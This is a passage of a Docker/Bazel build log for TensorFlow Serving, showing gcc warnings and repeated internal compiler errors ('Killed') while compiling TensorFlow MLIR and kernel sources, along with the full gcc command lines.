mlir::TF::SpaceToBatchNDOp::inferReturnTypes(mlir::MLIRContext*, llvm::Optional<mlir::Location>, mlir::ValueRange, mlir::DictionaryAttr, mlir::RegionRange, llvm::SmallVectorImpl<mlir::Type>&)': #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1342:39: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 1 + block_rank; i < input_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:1353:28: warning: comparison between signed and unsigned integer expressions [-Wsign-compare] #16 3126.6 for (uint64_t i = 0; i < block_rank; ++i) { #16 3126.6 ~~^~~~~~~~~~~~ #16 3126.6 In file included from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_n_z.cc:77:0: #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc: At global scope: #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:522:22: warning: 'mlir::LogicalResult mlir::TF::{anonymous}::VerifyReductionInputAndDims(mlir::Value, mlir::Value, mlir::Location)' defined but not used [-Wunused-function] #16 3126.6 static LogicalResult VerifyReductionInputAndDims(Value input, Value dims, #16 3126.6 ^~~~~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:309:11: warning: 'mlir::ArrayAttr mlir::TF::{anonymous}::ShuffleArrayAttr(mlir::ArrayAttr, llvm::ArrayRef<long int>, int)' defined but not used [-Wunused-function] #16 3126.6 ArrayAttr ShuffleArrayAttr(ArrayAttr attr, ArrayRef<int64_t> permutation, #16 3126.6 ^~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:296:25: warning: 'llvm::SmallVector<long int, 4> mlir::TF::{anonymous}::GetDataFormatPermutation(llvm::StringRef, llvm::StringRef)' defined but not used [-Wunused-function] #16 3126.6 SmallVector<int64_t, 4> GetDataFormatPermutation(StringRef from, StringRef to) { #16 3126.6 ^~~~~~~~~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:272:6: warning: 'bool mlir::TF::{anonymous}::CanUseGpuDevice(mlir::Operation*)' defined but not used [-Wunused-function] #16 3126.6 bool CanUseGpuDevice(Operation *op) { #16 3126.6 ^~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:260:6: warning: 'bool mlir::TF::{anonymous}::CanUseTensorCores(const mlir::TF::RuntimeDevices&)' defined but not used [-Wunused-function] #16 3126.6 bool CanUseTensorCores(const RuntimeDevices &devices) { #16 3126.6 ^~~~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:254:6: warning: 'bool mlir::TF::{anonymous}::CanUseGpuDevice(const mlir::TF::RuntimeDevices&)' defined but not used [-Wunused-function] #16 3126.6 bool CanUseGpuDevice(const RuntimeDevices &devices) { #16 3126.6 ^~~~~~~~~~~~~~~ #16 3126.6 external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops_helpers.inc:65:13: warning: 'bool mlir::TF::{anonymous}::IsUnknownDimOrRank(int64_t)' defined but not used [-Wunused-function] #16 3126.6 static bool IsUnknownDimOrRank(int64_t dim_or_rank) { #16 3126.6 ^~~~~~~~~~~~~~~~~~ #16 3126.6 gcc: internal compiler error: Killed (program cc1plus) #16 3126.6 Please submit a full bug report, #16 3126.6 with preprocessed source if appropriate. #16 3126.6 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/BUILD:509:1: Couldn't build file external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.o: C++ compilation of rule '@org_tensorflow//tensorflow/compiler/mlir/tensorflow:tensorflow_ops' failed (Exit 4): gcc failed: error executing command #16 3180.9 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 3180.9 exec env - \ #16 3180.9 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 3180.9 PWD=/proc/self/cwd \ #16 3180.9 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 3180.9 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.o' -DLLVM_ENABLE_STATS -D__STDC_LIMIT_MACROS -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -DLLVM_BUILD_GLOBAL_ISEL -DTF_USE_SNAPPY -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/llvm-project -iquote bazel-out/k8-opt/bin/external/llvm-project -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/CallOpInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/InferTypeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/OpAsmInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/RegionKindInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SideEffectInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/SymbolInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/DerivedAttributeOpInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/LoopLikeInterfaceIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ParserTokenKinds -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ControlFlowInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/StandardOpsIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/VectorInterfacesIncGen -Ibazel-out/k8-opt/bin/external/llvm-project/mlir/_virtual_includes/ViewLikeInterfaceIncGen -isystem external/llvm-project/llvm/include -isystem bazel-out/k8-opt/bin/external/llvm-project/llvm/include -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/llvm-project/mlir/include -isystem bazel-out/k8-opt/bin/external/llvm-project/mlir/include -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/_objs/tensorflow_ops/tf_ops.o) #16 3180.9 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/allocator.h:26, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/tensor.h:23, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/attr_value_util.h:24, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/node_def_util.h:23, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/shape_inference.h:21, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/common_shape_fns.h:20, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:25, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.h:38, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.cc:16: #16 3181.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 3181.1 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 3181.1 ^ #16 3181.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 3181.1 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 3181.1 ^ #16 3181.1 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 3181.1 from external/org_tensorflow/tensorflow/core/framework/resource_mgr.h:27, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_op_interfaces.h:29, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.h:38, #16 3181.1 from external/org_tensorflow/tensorflow/compiler/mlir/tensorflow/ir/tf_ops.cc:16: #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3181.1 TransactionToken** token) { #16 3181.1 ^~~~~ #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 3181.1 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3181.1 TransactionToken** token) { #16 3181.1 ^~~~~ #16 3181.1 gcc: internal compiler error: Killed (program cc1plus) #16 3181.1 Please submit a full bug report, #16 3181.1 with preprocessed source if appropriate. #16 3181.1 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/BUILD:3376:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels:cwise_op' failed (Exit 4): gcc failed: error executing command #16 3959.7 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 3959.7 exec env - \ #16 3959.7 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 3959.7 PWD=/proc/self/cwd \ #16 3959.7 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 3959.7 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DTF_USE_SNAPPY -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' '-DMLIR_GENERATED_GPU_KERNELS_ENABLED=1' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/cwise_op_equal_to_1.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_equal_to_1.o) #16 3959.7 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 3959.7 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 3959.7 from external/org_tensorflow/tensorflow/core/framework/allocator.h:26, #16 3959.7 from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:24, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_ops_common.h:29, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_equal_to_1.cc:16: #16 3959.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 3959.7 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 3959.7 ^ #16 3959.7 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 3959.7 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 3959.7 ^ #16 3959.7 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_ops_common.h:29, #16 3959.7 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_equal_to_1.cc:16: #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3959.7 TransactionToken** token) { #16 3959.7 ^~~~~ #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 3959.7 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 3959.7 TransactionToken** token) { #16 3959.7 ^~~~~ #16 3959.7 gcc: internal compiler error: Killed (program cc1plus) #16 3959.7 Please submit a full bug report, #16 3959.7 with preprocessed source if appropriate. #16 3959.7 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/BUILD:3376:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels:cwise_op' failed (Exit 4): gcc failed: error executing command #16 4065.1 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 4065.1 exec env - \ #16 4065.1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 4065.1 PWD=/proc/self/cwd \ #16 4065.1 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 4065.1 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DTF_USE_SNAPPY -DHAVE_SYS_UIO_H -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote bazel-out/k8-opt/bin/external/com_google_absl -iquote external/nsync -iquote bazel-out/k8-opt/bin/external/nsync -iquote external/eigen_archive -iquote bazel-out/k8-opt/bin/external/eigen_archive -iquote external/gif -iquote bazel-out/k8-opt/bin/external/gif -iquote external/libjpeg_turbo -iquote bazel-out/k8-opt/bin/external/libjpeg_turbo -iquote external/com_google_protobuf -iquote bazel-out/k8-opt/bin/external/com_google_protobuf -iquote external/zlib -iquote bazel-out/k8-opt/bin/external/zlib -iquote external/com_googlesource_code_re2 -iquote bazel-out/k8-opt/bin/external/com_googlesource_code_re2 -iquote external/farmhash_archive -iquote bazel-out/k8-opt/bin/external/farmhash_archive -iquote external/fft2d -iquote bazel-out/k8-opt/bin/external/fft2d -iquote external/highwayhash -iquote bazel-out/k8-opt/bin/external/highwayhash -iquote external/double_conversion -iquote bazel-out/k8-opt/bin/external/double_conversion -iquote external/snappy -iquote bazel-out/k8-opt/bin/external/snappy -iquote external/curl -iquote bazel-out/k8-opt/bin/external/curl -iquote external/boringssl -iquote bazel-out/k8-opt/bin/external/boringssl -iquote external/jsoncpp_git -iquote bazel-out/k8-opt/bin/external/jsoncpp_git -iquote external/aws -iquote bazel-out/k8-opt/bin/external/aws -iquote external/aws-c-common -iquote bazel-out/k8-opt/bin/external/aws-c-common -iquote external/aws-c-event-stream -iquote bazel-out/k8-opt/bin/external/aws-c-event-stream -iquote external/aws-checksums -iquote bazel-out/k8-opt/bin/external/aws-checksums -isystem external/nsync/public -isystem bazel-out/k8-opt/bin/external/nsync/public -isystem external/eigen_archive -isystem bazel-out/k8-opt/bin/external/eigen_archive -isystem external/gif -isystem bazel-out/k8-opt/bin/external/gif -isystem external/com_google_protobuf/src -isystem bazel-out/k8-opt/bin/external/com_google_protobuf/src -isystem external/zlib -isystem bazel-out/k8-opt/bin/external/zlib -isystem external/farmhash_archive/src -isystem bazel-out/k8-opt/bin/external/farmhash_archive/src -isystem external/double_conversion -isystem bazel-out/k8-opt/bin/external/double_conversion -isystem external/curl/include -isystem bazel-out/k8-opt/bin/external/curl/include -isystem external/boringssl/src/include -isystem bazel-out/k8-opt/bin/external/boringssl/src/include -isystem external/jsoncpp_git/include -isystem bazel-out/k8-opt/bin/external/jsoncpp_git/include -isystem external/aws/aws-cpp-sdk-core/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-core/include -isystem external/aws/aws-cpp-sdk-s3/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-s3/include -isystem external/aws/aws-cpp-sdk-transfer/include -isystem bazel-out/k8-opt/bin/external/aws/aws-cpp-sdk-transfer/include -isystem external/aws-c-common/include -isystem bazel-out/k8-opt/bin/external/aws-c-common/include -isystem external/aws-c-event-stream/include -isystem bazel-out/k8-opt/bin/external/aws-c-event-stream/include -isystem external/aws-checksums/include -isystem bazel-out/k8-opt/bin/external/aws-checksums/include -mavx '-std=c++14' '-D_GLIBCXX_USE_CXX11_ABI=0' '-DMLIR_GENERATED_GPU_KERNELS_ENABLED=1' -DEIGEN_AVOID_STL_ARRAY -Iexternal/gemmlowp -Wno-sign-compare '-ftemplate-depth=900' -fno-exceptions -msse3 -DTENSORFLOW_MONOLITHIC_BUILD -pthread -fno-canonical-system-headers -Wno-builtin-macro-redefined '-D__DATE__="redacted"' '-D__TIMESTAMP__="redacted"' '-D__TIME__="redacted"' -c external/org_tensorflow/tensorflow/core/kernels/cwise_op_select.cc -o bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/_objs/cwise_op/cwise_op_select.o) #16 4065.1 Execution platform: @local_execution_config_platform//:platform In file included from external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/FixedPoint:46:0, #16 4065.1 from external/org_tensorflow/tensorflow/core/framework/numeric_types.h:24, #16 4065.1 from external/org_tensorflow/tensorflow/core/framework/register_types.h:20, #16 4065.1 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_select.cc:23: #16 4065.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:14:41: warning: ignoring attributes on template argument '__m256i {aka __vector(4) long long int}' [-Wignored-attributes] #16 4065.1 typedef eigen_packet_wrapper<__m256i, 10> Packet32q8i; #16 4065.1 ^ #16 4065.1 external/org_tensorflow/third_party/eigen3/unsupported/Eigen/CXX11/src/FixedPoint/PacketMathAVX.h:15:41: warning: ignoring attributes on template argument '__m128i {aka __vector(2) long long int}' [-Wignored-attributes] #16 4065.1 typedef eigen_packet_wrapper<__m128i, 11> Packet16q8i; #16 4065.1 ^ #16 4065.1 In file included from external/org_tensorflow/tensorflow/core/framework/op_kernel.h:49:0, #16 4065.1 from external/org_tensorflow/tensorflow/core/kernels/cwise_ops_common.h:29, #16 4065.1 from external/org_tensorflow/tensorflow/core/kernels/cwise_op_select.cc:24: #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::StartTransaction(const string&, tensorflow::TransactionToken**)': #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h:350:46: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4065.1 TransactionToken** token) { #16 4065.1 ^~~~~ #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h: In member function 'tensorflow::Status tensorflow::Env::GetTransactionForPath(const string&, tensorflow::TransactionToken**)': #16 4065.1 external/org_tensorflow/tensorflow/core/platform/env.h:371:51: warning: parameter 'token' set but not used [-Wunused-but-set-parameter] #16 4065.1 TransactionToken** token) { #16 4065.1 ^~~~~ #16 4065.1 gcc: internal compiler error: Killed (program cc1plus) #16 4065.1 Please submit a full bug report, #16 4065.1 with preprocessed source if appropriate. #16 4065.1 See <file:///usr/share/doc/gcc-7/README.Bugs> for instructions. ERROR: /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/external/org_tensorflow/tensorflow/core/kernels/linalg/BUILD:193:1: Couldn't build file external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.o: C++ compilation of rule '@org_tensorflow//tensorflow/core/kernels/linalg:matrix_square_root_op' failed (Exit 4): gcc failed: error executing command #16 4542.9 (cd /root/.cache/bazel/_bazel_root/e53bbb0b0da4e26d24b415310219b953/execroot/tf_serving && \ #16 4542.9 exec env - \ #16 4542.9 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \ #16 4542.9 PWD=/proc/self/cwd \ #16 4542.9 PYTHON_BIN_PATH=/usr/bin/python3 \ #16 4542.9 /usr/bin/gcc -U_FORTIFY_SOURCE -fstack-protector -Wall -Wunused-but-set-parameter -Wno-free-nonheap-object -fno-omit-frame-pointer -g0 -O2 '-D_FORTIFY_SOURCE=1' -DNDEBUG -ffunction-sections -fdata-sections '-std=c++0x' -MD -MF bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.d '-frandom-seed=bazel-out/k8-opt/bin/external/org_tensorflow/tensorflow/core/kernels/linalg/_objs/matrix_square_root_op/matrix_square_root_op.o' -DCURL_STATICLIB -DPLATFORM_LINUX -DENABLE_CURL_CLIENT -DOPENSSL_IS_BORINGSSL -DHAVE_SYS_UIO_H -DTF_USE_SNAPPY -D__CLANG_SUPPORT_DYN_ANNOTATION__ -DEIGEN_MPL2_ONLY '-DEIGEN_MAX_ALIGN_BYTES=64' '-DEIGEN_HAS_TYPE_TRAITS=0' -iquote external/org_tensorflow -iquote bazel-out/k8-opt/bin/external/org_tensorflow -iquote external/com_google_absl -iquote 